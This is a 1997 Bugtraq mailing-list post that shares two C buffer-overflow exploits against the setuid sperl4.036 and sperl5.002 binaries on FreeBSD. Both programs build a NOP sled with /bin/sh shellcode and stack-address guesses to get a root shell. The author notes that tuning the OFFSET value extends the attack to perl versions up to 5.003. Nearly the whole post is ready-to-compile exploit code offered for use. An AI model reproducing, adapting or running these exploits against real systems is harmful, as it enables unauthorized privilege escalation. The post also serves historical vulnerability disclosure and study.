Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Exploits for FreeBSD sperl4.036 & sperl5.00x

From: deliver () FREE POLBOX PL (Deliver)
Date: Mon, 21 Apr 1997 16:34:41 PDT

  If somebody want to test perl5.00X or perl4.036 buffer overflow exploits
there are two for FreeBSD...

  First works on perl4.036 and the second on perl5.002 ...
With a little modyfication of OFFSET value you can overflow all versions up
to perl5.003

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0+1;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768+1);
        memcpy(&buf[768+1],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl5.00X by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          1000

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768);
        memcpy(&buf[768],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------

PS: Pozdrowienia dla wszystkich polskich hackerow ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ?                                                      //
// OVX - deliver () free polbox pl                                         //
//////////////////////////////////////////////////////////////////////////
Previous By Date Next
Previous By Thread Next

Current thread: